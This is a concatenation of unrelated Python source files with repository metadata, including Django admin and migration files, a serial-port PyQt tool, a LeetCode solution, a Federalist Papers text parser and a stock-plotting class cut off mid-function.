996e69c5148b5df26512a00ee71bb6d5b3048f9e | b805ded84cff8878ae70d772e50cface0c3aa45c | /proxy_pool/proxy_pool/settings.py | b6ecc4f6634f97f0ee761b1fd95cd587f2e5db95 | [] | no_license | CNZedChou/python-web-crawl-learning | 74f014fe95797d3f534e373de8451d2dfcc0600c | 5edf8f53e1bb9df3661ec007bb4d7f0ba04ab013 | refs/heads/master | 2022-11-10T08:26:53.275547 | 2020-07-06T02:33:03 | 2020-07-06T02:33:03 | 275,563,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # !/usr/bin/python3
# -*- coding: utf-8 -*-
"""
@Author : Zed
@Version : V1.0.0
------------------------------------
@File : settings.py
@Description : redis的密码,如果为空则表示没有密码
@CreateTime : 2020-6-30 11:22
------------------------------------
@ModifyTime :
"""
PASSWORD = ''
HOST = 'localhost'
PORT = '6379'
# 代理池的名称
PROXYPOOL = 'proxies'
TEST_API = 'https://www.baidu.com'
TEST_HEADERS ={
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
}
# 循环校验时间
CYCLE_VALID_TIME = 60
# 代理池数量的最小值
LOWER_NUM = 10
# 代理池数量的最大值
UPPER_NUM = 100
# 检查时间
CHECK_POOL_CYCLE = 60 | [
"1021844583@qq.com"
] | 1021844583@qq.com |
af80e333fa1ab4339159aceac4aadf6d4670d924 | 289ab4b6eeb1a4f845ba66bd21c4a82670d554f3 | /cart/admin.py | f65101b164ca8b59688bd1c3ca5e5d1f7b65aeb2 | [] | no_license | 1arshan/project-e_com | 1d0765b28800ccf645dfe67ffa311ce7a6605309 | 632ed6bc4bf716777fab7c98113f754f47468705 | refs/heads/master | 2022-11-08T17:20:22.726675 | 2020-06-25T15:04:37 | 2020-06-25T15:04:37 | 270,087,413 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | from django.contrib import admin
from .models import *
from django_better_admin_arrayfield.admin.mixins import DynamicArrayMixin
@admin.register(Sub1)
class Sub1Admin(admin.ModelAdmin):
list_display = ("name", "link",)
list_filter = ("link",)
admin.site.register(CartObject)
@admin.register(FinalProduct)
class MyModelAdmin(admin.ModelAdmin, DynamicArrayMixin):
list_display = ("name", "link", "model_no",)
list_filter = ("link",)
| [
"1arshanahmad@gmail.com"
] | 1arshanahmad@gmail.com |
e81efcf1d9371dcc4c93cc298cb1fde203cd023e | 5202dacbfe047602531a32a1404061f7738e1c9a | /PersonalActivityAssistant_SourceCode/PAA/appointments/migrations/0001_initial.py | 6796684eb3a1dfef59d59230e539764c9de8745e | [] | no_license | bhna2713/CSCI-5448-OOAD-PROJECT-GROUP | 90bbec5b83db2e326fa9a6b5399d047a4a50b1fc | 95f7d658b3b1e9bae67e9a423c024e43fe22f5fb | refs/heads/master | 2016-08-11T21:22:31.269028 | 2016-04-28T14:58:08 | 2016-04-28T14:58:08 | 51,010,773 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 739 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-03-26 21:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Appointments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Title', models.CharField(max_length=120)),
('Date', models.DateTimeField(auto_now=True)),
('Venue', models.CharField(max_length=120)),
('Time', models.CharField(max_length=120)),
],
),
]
| [
"bharatnc@gmail.com"
] | bharatnc@gmail.com |
593eff5c51f3663c6b63401945d8e42c0bd744e9 | 1e9de96619592ed25c3a4ff57b6a78717882a709 | /app/resources/database.py | 970e203f904febf5289d936283299a350e6346e4 | [] | no_license | AntoineDao/example-service | 503d08788f7e557ee12f72fabfa537136b927d3f | 8b088ecd0a67642737a883d7f035722a8cd7a0b4 | refs/heads/master | 2020-04-22T07:13:59.199629 | 2019-02-07T17:36:17 | 2019-02-07T17:36:17 | 170,213,289 | 0 | 0 | null | 2019-02-11T22:32:16 | 2019-02-11T22:32:16 | null | UTF-8 | Python | false | false | 988 | py | import os
import datetime
import uuid
from flask_sqlalchemy import SQLAlchemy
import app
db = SQLAlchemy()
class Example(db.Model):
""" Example Model for storing example related details """
__tablename__ = "example"
id = db.Column(db.String(), primary_key=True, default=str(uuid.uuid4()))
email = db.Column(db.String(255), unique=True, nullable=False)
registered_on = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow())
admin = db.Column(db.Boolean, nullable=False, default=False)
username = db.Column(db.String(50), unique=True)
password_hash = db.Column(db.String(100))
test = db.Column(db.String(100))
def __repr__(self):
return "<User '{}'>".format(self.username)
@classmethod
def from_dict(cls, data):
new = cls(
id=data.get('id'),
email=data.get('email'),
admin=data.get('admin'),
username=data.get('username')
)
return new
| [
"antoinedao1@gmail.com"
] | antoinedao1@gmail.com |
699f3bf4ddcf39bc85c986fc35c789f2dd92398e | a3d98b7885df577e18f8f798fe6374720524c0fa | /topology/migrations/0006_remove_machine_slug.py | b5651243e55811df6df586413284efe7d9f7545e | [
"MIT"
] | permissive | DylanWatson/VENT | 296276c025ad54aaea803f03e48dd5e0ece401b7 | 0f26876b1790abfb217c3db79455fe1416730bff | refs/heads/master | 2021-01-20T12:22:51.580395 | 2015-05-05T20:44:33 | 2015-05-05T20:44:33 | 30,122,860 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('topology', '0005_machine_slug'),
]
operations = [
migrations.RemoveField(
model_name='machine',
name='slug',
),
]
| [
"watson93@gmail.com"
] | watson93@gmail.com |
c58f04c352758ec38036a3158f57cde81fbbd04f | 3879d1ca43c573c209f962182cd1e7f7fe978fbf | /leetcode/1973. Count Nodes Equal to Sum of Descendants/1973.py | 0b8f98e6fa4a8d999bcefc23edcbc239a22b78c5 | [] | no_license | DoctorLai/ACM | 34a5600a5adf22660c5d81b2d8b7a358be537ecf | aefa170f74c55c1230eb6f352770512b1e3f469e | refs/heads/master | 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 | C++ | UTF-8 | Python | false | false | 864 | py | # https://helloacm.com/teaching-kids-programming-count-nodes-equal-to-sum-of-descendants-recursive-depth-first-search-algorithm/
# https://leetcode.com/problems/count-nodes-equal-to-sum-of-descendants/
# MEDIUM, DFS, RECURSION
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def equalToDescendants(self, root: Optional[TreeNode]) -> int:
self.ans = 0
def dfs(root):
if not root:
return 0
lsum = dfs(root.left)
rsum = dfs(root.right)
if lsum + rsum == root.val:
self.ans += 1
return lsum + rsum + root.val
dfs(root)
return self.ans
| [
"noreply@github.com"
] | noreply@github.com |
ef5e7324a1148561025d0b287b395e8274acc7da | 4fb5bbde4e1edaadbb1b1debe4cfcb31362001ed | /IsarMainDisp/PythonVersiyonu/Tekrar/Tekrar1.py | bca68c85a6b9cd62e911d1ed40ad87667c9f5bc6 | [] | no_license | develooper1994/RCScalculator1 | ce285a4bf95eaeca5af1d8c90e45ce5d702b3e79 | be7cb0dc436db8378003ddfe41c61cd96c3d6b4f | refs/heads/master | 2020-05-04T18:55:00.531640 | 2019-04-03T21:44:14 | 2019-04-03T21:44:14 | 179,371,600 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,046 | py | from typing import List
print("Selçuk")
def passing_example(a_list, an_int=2, a_string="A default string"):
a_list.append("A new item")
an_int = 4
return a_list, an_int, a_string
mylist: List[int] = [1, 23, 85]
myist: int = 10
print(passing_example(mylist, myist))
# ------------ Class ------------
class MyClass(object):
common = 10
def __init__(self): self.myVariable = 3
def myfunction(self, arg1: object, arg2: object) -> object:
return self.myVariable
classinstance = MyClass()
classinstance2 = MyClass()
print(classinstance.myfunction(1,2))
print(classinstance.common)
print(classinstance2.common)
MyClass.common = 30
print(classinstance.common)
print(classinstance2.common)
# not working
MyClass.myVariable = 5
print(classinstance.myVariable)
print(classinstance2.myVariable)
classinstance.myVariable = 330780
print(classinstance.myVariable)
print(classinstance2.myVariable)
SUM = sum(0 for i in [3,5,7,9,4,3,7] if i == 7)
print(SUM)
| [
"noreply@github.com"
] | noreply@github.com |
00c8f30dba2a82f7e67cb93f025e52e09d9e17d1 | 692fbe4ff8076718460e94c22f334a9d36b82b5d | /AnonWork/masterimport.py | 341e96ba26a2b7e6e02f74e2b577e3d06f10176b | [] | no_license | Harandi6135/ZooData | 8971ebffb5a7adcd16dbe9d2298101da7f072ea3 | 44e262f8ac3be54559f395ad99eb012db2a6b217 | refs/heads/master | 2020-12-24T06:08:02.691146 | 2016-11-03T14:14:48 | 2016-11-03T14:14:48 | 73,226,156 | 1 | 0 | null | 2016-11-08T20:54:22 | 2016-11-08T20:54:21 | null | UTF-8 | Python | false | false | 3,957 | py | import pandas as pd
import numpy as np
import re
import datetime
from itertools import tee, islice, chain, izip
# This is a test
############## Import Raw datafile ##############
%cd "/Users/coreyjackson/Dropbox/ZooSOCS dropbox/Papers/CSCW 2017 (AnonWork)/RawData/Archive"
raw_data = pd.read_csv('HiggsHuntersClassificationsAnonWork112615.csv') # CHANGE NAME OF .CSV FILE
# Rename columns
anon_population = pd.DataFrame(raw_data, columns = ['_id', 'created_at', 'favorite', 'subject_ids', 'tutorial','user_id','user_ip','user_name'])
del raw_data
# Need to first parse date/time to new field
anon_population['year'] = anon_population['created_at'].str.extract('(....-..-..)')
anon_population['time'] = anon_population['created_at'].str.extract('(..:..:..)')
anon_population['datetime'] = anon_population['year'] + " " +anon_population['time']
anon_population['datetime'] = pd.to_datetime(anon_population['datetime'])
# Delete the fields we created and those that are unnecessary
del anon_population['year']
del anon_population['time']
del anon_population['created_at']
#del anon_population['tutorial']
#del anon_population['favorite']
# Sort dataframe by user by date
anon_population = anon_population.sort_values(['user_ip','datetime'], ascending=[1, 1])
# Makes new column for user ip
anon_population['same_ip'] = anon_population['user_ip'].shift() == anon_population['user_ip']
# Shifts up one removing first observation, last is NA (for ip)
anon_population.same_ip = anon_population.same_ip.shift(-1)
# Makes new column for datetime
anon_population['datetime2'] = anon_population['datetime']
# Shifts up one removing first observation, last is NA (for datetime)
anon_population.datetime2 = anon_population.datetime2.shift(-1)
# Changes variabel to datetime variable
anon_population['datetime'] = pd.to_datetime(anon_population['datetime'])
anon_population['datetime2'] = pd.to_datetime(anon_population['datetime2'])
# Subtract time
anon_population['timespent'] = anon_population['datetime2'] - anon_population['datetime']
# Function for iterating
def previous_and_next(some_iterable):
prevs, items, nexts = tee(some_iterable, 3)
# prevs = chain([None], prevs)
prevs = chain([0], prevs)
next# s = chain(islice(nexts, 1, None), [None])
nexts = chain(islice(nexts, 1, None), [0])
return izip(prevs, items, nexts)
# Count through the number of annotation by ip address
ip = anon_population['user_ip']
classification_no = []
for previous, item, nxt in previous_and_next(ip):
if item == previous:
classification = classification + 1
classification_no.append(classification)
# print "Item is now", item, "next is", nxt, "previous is", previous
else:
classification = 1
classification_no.append(classification)
anon_population['Classifications'] = classification_no
# Loop to iterate and create session variable by ip address
time = anon_population['timespent']
ip = anon_population['user_ip']
session_no = []
session = 1
for i,j,l,m in zip(ip, ip[1:], time, time[1:]):
#print i,j,l,m
if i == j and l <= datetime.timedelta(minutes=30):
session = session
session_no.append(session)
elif i == j and l > datetime.timedelta(minutes=30):
session = session + 1
session_no.append(session)
else :
session = 1
session_no.append(session)
# Check length of anon file and session list
len(anon_population)
len(session_no)
# Add one element to beginning of list. Required for appending list
session_no.insert(0,1)
del anon_population['datetime2']
# Paste list to anon_population dataframe
anon_population['Session'] = session_no
#anon_population.Session = anon_population.Session.shift(-1)
time = anon_population['timespent']
time_sec = []
for i in time:
timeseconds = i.total_seconds()
time_sec.append(timeseconds)
anon_population['Time_Seconds'] = time_sec
# Export dataframe
anon_population.to_csv('HiggsHunters.csv') #Change File name to project name.
| [
"cjacks04@syr.edu"
] | cjacks04@syr.edu |
a0bb22d75043b02cc63c5177d8cb32a240dfb49c | bef6f2e5b47ccb21b5be4d0a9e5443363448c2fa | /uartToFile/uart_qt.py | 3a1f5deed697c97681384c4b6863f7d532f101c4 | [] | no_license | cyang812/tools | cd7b7ff1c0014f79975116445aa05cc1fb5b4d59 | 5fc5b6533ea2486324884905d81a605c7ca5f5db | refs/heads/master | 2023-02-04T10:05:49.796267 | 2023-01-10T09:25:56 | 2023-01-10T09:25:56 | 133,904,026 | 12 | 12 | null | null | null | null | UTF-8 | Python | false | false | 3,155 | py | # -*- coding: utf-8 -*-
# @Author: cyang812
# @Date: 2018-05-20 20:52:16
# @Last Modified by: ygh
# @Last Modified time: 2018-06-05 09:45:20
import sys
import threading
import serial
import time
import ctypes
import win32
import win32file
import win32con
import pywintypes
from PyQt5.QtWidgets import (QWidget, QPushButton, QFrame, QApplication)
from PyQt5.QtGui import QColor
def open_serial(com, baudrate):
try:
serialFd = serial.Serial(com, baudrate, timeout=60)
return serialFd
except Exception as e:
print(e)
def send_serial(com, content):
com.write(content.encode())
def receive_serial(com, count):
return com.read(count)
def close_serial(com):
com.close()
class uartToFile(QWidget):
def __init__(self):
super().__init__()
self.initUI()
self.com = serial.Serial()
def initUI(self):
self.col = QColor(0, 0, 0)
serialOpenCloseButton = QPushButton('openClose', self)
serialOpenCloseButton.clicked.connect(self.openCloseSerial)
serialOpenCloseButton.setCheckable(True)
serialOpenCloseButton.move(20, 10)
saveToFileButton = QPushButton('saveOrNot', self)
saveToFileButton.clicked[bool].connect(self.open_close)
saveToFileButton.setCheckable(True)
saveToFileButton.move(20, 60)
self.square = QFrame(self)
self.square.setGeometry(150, 20, 100, 100)
self.square.setStyleSheet("QWidget { background-color: %s }" %
self.col.name())
self.setGeometry(300, 300, 600, 400)
self.setWindowTitle('uart To File')
self.show()
def open_close(self, pressed):
source = self.sender()
print(source.text(), pressed)
if source.text() == 'saveOrNot':
if pressed == True:
print('save file')
else:
print('close file')
def openCloseSerial(self):
print('openCloseSerial')
t = threading.Thread(target=self.openCloseSerialProcess)
t.setDaemon(True)
t.start()
return
def openCloseSerialProcess(self):
try:
if self.com.is_open:
self.com.close()
self.receiveProgressStop = True
print('uart close')
print('receiveCount =', self.receiveCount)
else:
try:
self.com.baudrate = 115200
self.com.port = 'COM7'
print(self.com)
self.com.open()
print('uart open')
receiveProcess = threading.Thread(target=self.receiveData)
receiveProcess.setDaemon(True)
receiveProcess.start()
except Exception as e:
self.com.close()
print('uart open fail')
print(e)
self.receiveProgressStop = True
except Exception as e:
print(e)
return
def receiveData(self):
self.receiveProgressStop = False
self.receiveCount = 0
self.timeLastReceive = 0
while(not self.receiveProgressStop):
try:
if self.com.is_open:
print("is_open")
content = self.com.read(1)
print("try read")
if len(content):
self.receiveCount += len(content)
print("content = ", content)
except Exception as e:
print(e)
print("receiveData error")
if self.com.is_open:
print("self.com.close")
self.com.close()
return
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = uartToFile()
sys.exit(app.exec_())
| [
"cy950812@gmail.com"
] | cy950812@gmail.com |
deb423ef918c9bc40f37e909aebdb85cb4286e76 | 62546d6e9083c4d531cee69c52135ef291b54443 | /Guess_Game.py | 916fb8ca689a1820a08a80ef003ebdf31dfec153 | [] | no_license | Yaelbm-Git/World_Of_Games | 0b466ced65e2b0800ba68bcf5d9e02436b11a0fa | f5b4410fe45617bb8ad12295ed1a777daeaabe7f | refs/heads/master | 2023-02-06T19:10:05.225142 | 2020-12-28T23:37:34 | 2020-12-28T23:37:34 | 321,633,390 | 0 | 1 | null | 2020-12-17T09:00:37 | 2020-12-15T10:31:16 | Python | UTF-8 | Python | false | false | 1,038 | py | import random
from myAbstract import MyAbstract
class Guess_Game(MyAbstract):
def __init__(self, diff):
self.diff = diff
def welcome(self):
print("\nWelcome to the Guess Game! \n")
def get_input_from_pc(self):
secret_number = random.randint(1, self.diff)
return secret_number
def get_input_from_user(self):
print("Please guess a number between 1 to", self.diff, end = '')
user_guess = input(": ")
if not user_guess.isdigit():
print("your guess must be a digit")
self.get_input_from_user()
exit()
int_user_guess = int(user_guess)
if not int_user_guess in range(1, 11):
print("Your choice is invalid. Your guess must be between 1 to 10")
self.get_input_from_user()
exit()
return (int_user_guess)
def compare(self):
return self.get_input_from_user() == self.get_input_from_pc()
def play(self):
self.welcome()
return (self.compare())
| [
"yael.ben-michael@gmail.com"
] | yael.ben-michael@gmail.com |
0b205c12342378f7ce7b47dbe339627f706f8e2f | dd73faa1c747089c44dbe85e081de5a089046329 | /api_app/views/index_view.py | afa13a27813919ffbd4ba28140a04fb8d96188ab | [] | no_license | spaun299/api_tv_web | 34aaa6da5fc0f3154a5830953ec8e9ee90d1a3b0 | a19c0079e06a7c823236fda5ffe9d1e46a5e829d | refs/heads/master | 2021-01-10T03:39:25.309627 | 2016-02-12T10:26:34 | 2016-02-12T10:26:34 | 51,149,276 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from ..urls.blueprints import index_bp
from flask import render_template, g
from ..constants.constants import ACTIVE_PAGES
@index_bp.route('/')
@index_bp.route('/index')
def index():
return render_template('index.html', active_page=ACTIVE_PAGES['main'])
| [
"you@example.com"
] | you@example.com |
8f5bfbe91a76e854fc4c00a22b6e106d54e1f08f | 1dd9ab4f92ad4fbaa4cba329924013b84c932857 | /operator_precedence.py | bb0dc677a0fde7273c84298872c5b427b7957f1a | [] | no_license | royalbhati/PythonScripts | ddae90abff6a123f7b7f6c4e801cbc8f15e4b7ff | f2e8ad977b7ad88b589960c360c4df469952856f | refs/heads/master | 2021-09-14T00:20:05.428995 | 2018-05-06T13:37:19 | 2018-05-06T13:37:19 | 121,004,821 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,561 | py | import sys
import shlex
import csv
import pprint
class Stack:
def __init__(self):
self.items = []
def isEmpty(self):
return self.items == []
def push(self, item):
self.items.append(item)
def pop(self):
return self.items.pop()
def peek(self):
return self.items[len(self.items)-1]
def size(self):
return len(self.items)
def items(self):
return self.items
def get_prec(element,i):
for x in range(len(order_table[0])):
if element=='$' and order_table[0][x]=='$':
index_i=get_val_i(i)
return order_table[x][index_i]
if element=='+' and order_table[0][x]=='+':
index_i=get_val_i(i)
return order_table[x][index_i]
if element=='-' and order_table[0][x]=='-':
index_i=get_val_i(i)
return order_table[x][index_i]
if element=='*' and order_table[0][x]=='*':
index_i=get_val_i(i)
return order_table[x][index_i]
if element=='/' and order_table[0][x]=='/':
index_i=get_val_i(i)
return order_table[x][index_i]
if element=='i' and order_table[0][x]=='i':
index_i=get_val_i(i)
return order_table[x][index_i]
def get_val_i(i):
for x in range(len(order_table[0])):
if order_table[0][x]=='$' and order_table[0][x]==i:
return x
elif order_table[0][x]=='+' and order_table[0][x]==i:
return x
elif order_table[0][x]=='-' and order_table[0][x]==i:
return x
elif order_table[0][x]=='*' and order_table[0][x]==i:
return x
elif order_table[0][x]=='/' and order_table[0][x]==i:
return x
elif order_table[0][x]=='i' and order_table[0][x]==i:
return x
input_string = "i+i*i"
input_ind = list(shlex.shlex(input_string))
input_ind.append('$')
order_table=[['', '+', '-', '*', '/', 'i', '$'],
['+', '>', '>', '<', '<', '<', '>'],
['-', '>', '>', '<', '<', '<', '>'],
['*', '>', '>', '>', '>', '<', '>'],
['/', '>', '>', '>', '>', '<', '>'],
['i', '>', '>', '>', '>', '', '>'],
['$', '<', '<', '<', '<', '<', '']]
pprint.pprint(order_table)
a='''E->E+E
|E-E
|E*E
|E/E
|i'''
matching_str=Stack()
matching_str.push('$')
def evalu(prec_op,i):
if prec_op=='<':
matching_str.push(i)
print('shift')
elif prec_op=='>':
matching_str.pop()
print('reduce')
a=get_prec(matching_str.peek(),i)
evalu(a,i)
elif prec_op=='':
pass
for i in input_ind:
element=matching_str.peek()
prec_op=get_prec(element,i)
print(matching_str.items)
evalu(prec_op,i)
if matching_str.size()==1 and matching_str.peek()=='$':
print('String accepted')
else:
print('String not accepted')
| [
"noreply@github.com"
] | noreply@github.com |
b5c4f9532ae6f0269e6d76b4acf677bf009ad9f1 | d8874483816989dd796ab3f9f09af068ae9cea5d | /elevent_model.py | 4c81037b013dcf9c93ec123edd62f9cbf7bbd23d | [] | no_license | cnn911/tmp | 9cf015665d1a134a190514abb5a3daa2d8177c63 | 873c8ccd7f1e29e6be5209c63039172c94a4dc69 | refs/heads/master | 2023-07-19T14:24:44.017693 | 2021-09-22T11:06:45 | 2021-09-22T11:06:45 | 110,768,079 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,398 | py | # -*- encoding: utf-8 -*-
"""
Created on Tue Jan 23 21:51:57 2018
@author: Administrator
"""
'''
策略模式:它是一种行为型模式。用接口类来实现算法的大体框架,然后根据不同的需求来实现具体的细节。。
他主要是针对行为,活动,算法这类动态内容,所以被称之为行为型模式?
他不同与工厂模式的地方可能在于他针对的是类行为型的对象。
有的时候子类里的行为、状态是不断更新,增加的,所以如果从父类继承的话需要不断的增加所以并不合适,这时候就需要
把变化的部分抽象出来,然后独自形成一个框架。
完成一个事物我需要的是什么?
'''
from abc import ABC
from abc import abstractmethod
from collections import namedtuple
customer =namedtuple('test', 'name price')
class Line:
def __init__(self, price):
self.price = price
def total(self):
return self.price
class ZongJia:
def __init__(self, cart):
self.cart = cart
def total(self):
self._total = sum( i.total() for i in self.cart)
return self._total
class Prom(ABC):
@abstractmethod
def dicount(self, zongjia):
pass
class FirstCount(Prom):
def discount(self, zongjia):
return 0.7*zongjia
class SecondCount(Prom):
def dicount(self, zongjia):
return zongjia-20
| [
"605543116@qq.com"
] | 605543116@qq.com |
178406f49b84e6e5e2631898d1ca498baa7ecabf | 00feeddadc58382e8f71ca5e1da0815ddf913f20 | /twitter.py | 144e565f391d23dd424f537bbe4707bad3528354 | [] | no_license | aimoa/moadb | a229731cd02855352ffb141d22dc76298fcb4892 | 9d66bb3fd76d266681d42f23ad0d033f2acb15e3 | refs/heads/master | 2021-01-18T21:07:24.965515 | 2016-05-19T06:21:52 | 2016-05-19T06:21:52 | 55,277,120 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,525 | py | import requests
import json
from tweepy import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
from config import *
from ghash import ghash
class ImageListener(StreamListener):
self.subject = 0
def on_data(self, data):
data = json.loads(data)
if "extended_entities" in data and "media" in data["extended_entities"]:
for medium in data["extended_entities"]["media"]:
if medium["type"]=="video":
continue
url = medium["media_url_https"]
tweet = medium["url"]
code = ghash(url)
data = json.dumps({'image': { \
'url': url, \
'tweet': tweet, \
'ghash': code \
'subject': self.subject
}})
headers = {'content-type': 'application/json'}
r = requests.post(server, data=data, headers=headers)
return True
def on_error(self, status):
print status
class MoaListener(ImageListener):
self.subject = subjects['Moa']
class SuListener(ImageListener):
self.subject = subjects['Su']
class YuiListener(ImageListener):
self.subject = subjects['Yui']
if __name__ == '__main__':
listener = MoaListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
stream.filter(track=keywords)
| [
"amakalf@gmail.com"
] | amakalf@gmail.com |
ab481e70c1de1b4accd23c0718be1f5394c6a1f3 | b87a6c007e4f64c892f9ecbccba7c90b2d12a1f9 | /src/settings/main.py | e9ab37cb8085db1dac10b37f6e71167ee03a27ff | [] | no_license | labmiriade/bot-cli | 430d5598b69138655a44bd732db920f42d53e9fb | 9c665a1397f030684e20279174a5d5e4c1c7fda4 | refs/heads/main | 2023-06-26T08:07:30.893753 | 2021-06-19T14:31:12 | 2021-06-19T14:31:12 | 344,878,365 | 1 | 0 | null | 2023-03-20T16:49:25 | 2021-03-05T17:03:42 | Python | UTF-8 | Python | false | false | 369 | py | import click
from .autocompletion import auto_completamento
from .empty_cache import svuota_cache
from .whoami import whoami
@click.group(help="Impostazioni della cli")
def settings():
"""
The group for holding commands on rapportini
"""
pass
settings.add_command(auto_completamento)
settings.add_command(svuota_cache)
settings.add_command(whoami)
| [
"tom139@users.noreply.github.com"
] | tom139@users.noreply.github.com |
2e6887fd13a2e9a511bc09f740624b798cb447da | 44c49a36d548ded98adfc5b5bf358d85d43c1592 | /Insurance-Server/myInsurance/mySurance/views.py | 50ab16582e4edaf11da04381288f61ba4cf71317 | [] | no_license | crowdhackathon-insurance/The-Bitles | 48e08a41d855332146ca602559f5331764eb6f06 | 6b166a29ee20540fd5b7f822548c380b00f997c2 | refs/heads/master | 2021-01-24T10:18:23.307024 | 2016-10-02T14:48:02 | 2016-10-02T14:48:02 | 69,738,811 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from django.shortcuts import render
from django.http import HttpResponse
def index(request):
return HttpResponse("Welcome to mySurance!")
# Create your views here.
| [
"orfetheo@gmail.com"
] | orfetheo@gmail.com |
cfb31542806e913e6bbdca1f11f714d5f1879477 | 461142279535ac9194138abd69c0c4cac05d5094 | /DocumentHandler/src/retrieval/extractors_per_dataset/federalist_papers_extractor.py | 6cd62967e95fdab7d0901237de3e69469638bf24 | [
"MIT"
] | permissive | ygorcanalli/documenthandler | 8e926607b94bacef33e7970e5e34378c64293761 | 7fb29747aa6c1000875ff7c332974d3d8618f6d4 | refs/heads/master | 2020-12-24T15:05:02.033594 | 2014-12-31T12:54:56 | 2014-12-31T12:54:56 | 18,921,800 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,157 | py | '''
Created on 21/03/2014
@author: fellipe
'''
import os
import csv
import xml.dom.minidom
import html.parser
from pprint import pprint
from ufrrj.extractors_per_dataset import write_on_file
if __name__ == '__main__':
path = "/media/fellipe/dados/Colecoes de Dados/Authorship/Federalist Papers/papers"
f = open(os.path.join(path,"Paper_x_Author_List.csv"), 'r') # opens the csv file
h = html.parser.HTMLParser()
htm_papers = []
with open(os.path.join(path,"papers.htm"), 'r', encoding ='latin1') as content_file:
lines = content_file.readlines()
current_content = ""
for li in lines:
if li.find('<?xml') != -1 or li.find('<html') != -1 or li.find('</html') != -1 or li =='\n' != -1 or li.find('<p> <br /><br /><br /><br /></p>')!= -1:
continue
if li.find('<h2>') != -1 and current_content != "":
htm_papers.append(current_content)
current_content = ""
current_content += h.unescape(li)
htm_papers.append(current_content)
papers = []
for i in range(0,len(htm_papers)):
current_content = htm_papers[i].replace('<p>', '').replace('</p>', '').replace('<h3>', '').replace('</h3>', '').replace('<h2>', '').replace('</h2>', '')
papers.append({'id':(i+1),'content':current_content,'author':''})
print('len:%d'%len(htm_papers))
try:
reader = csv.reader(f) # creates the reader object
for row in reader: # iterates the rows of the file in orders
if row[0] == 'number':
continue
# print(row)
paper_id = int(row[0]) - 1
papers[paper_id]['author'] = row[1]
papers[paper_id]['disputed'] = row[2].replace(';','')
if len(row) > 3:
papers[paper_id]['obs'] = row[3]
finally:
f.close() # closing
for paperi in papers:
write_on_file(path = os.path.join(path.replace('papers','papers_per_author'),paperi['author'],str(paperi['id'])),content = paperi['content'], encoding='utf8')
pprint(papers) | [
"ygor.canalli@gmail.com"
] | ygor.canalli@gmail.com |
e36a279c7da1ddf582be9cd6892c444d8c89ff99 | f7cf5647517d5d728a306967bf7531cc86525d5a | /sdc_scale.py | 2bba7f66631bbd7661779f25b465819206148b11 | [] | no_license | khokhlov/seismic_data_converter | c6b4663efcf091eb2f76f260374a94cde961accf | b904f8cfa6e846beaa1c82643638886ca2dd6baa | refs/heads/master | 2021-06-08T05:22:34.945126 | 2020-06-19T14:05:27 | 2020-06-19T14:05:27 | 95,864,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 634 | py | #!/usr/bin/env python
# (C) Nikolay Khokhlov <k_h@inbox.ru> 2017
import argparse
import numpy as np
import sys
from binjson import load_bin, save_bin
def main():
parser = argparse.ArgumentParser(description = 'Scale all values at bin file.')
parser.add_argument('input', help='input file')
parser.add_argument('output', help='output file')
parser.add_argument('-s', '--scale', help='scale value', type=float, required = True)
args = parser.parse_args()
jd, data = load_bin(args.input)
data *= args.scale
save_bin(args.output, data, jd['bbox'])
if __name__ == "__main__":
main()
| [
"kolya.khokhlov@gmail.com"
] | kolya.khokhlov@gmail.com |
1d9cfd061ea4127fdb15f3e00a26392d4a007edf | 94bca958f08a662ecdd5005b89644e93408d4ca2 | /stock.py | 4daa61550e7051c5a6d4d2c57e669e765efd06d7 | [] | no_license | SunnyNagam/StockMarketSimulator | 0f014a55f9cddf4c941291c01630d4600246951a | 19a9deac322bb0927e66884bdc5c0fe05230d1f2 | refs/heads/master | 2020-09-30T11:07:29.226903 | 2020-01-04T07:18:53 | 2020-01-04T07:18:53 | 227,275,660 | 0 | 0 | null | 2019-12-11T07:58:40 | 2019-12-11T04:21:38 | Python | UTF-8 | Python | false | false | 2,439 | py | import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import matplotlib.dates as mdates
import datetime as dt
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
class Stock:
fileTemplate = "data/individual_Stocks_5yr/%s_data.csv"
def __init__(self, ticker):
self.ticker = ticker
self.data = self.loadData()
def loadData(self):
return pd.read_csv(self.fileTemplate % self.ticker)
def printTicker(self):
print(self.ticker)
def plot(self, columns=["high"],
x_interval=None, y_interval=None,
start_date=None, end_date=None, bot_results=None):
x = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in self.data["date"]]
if start_date and end_date:
startInd, endInd = dateRangeToInds(start_date, end_date, x)
else:
startInd, endInd = (0, len(x))
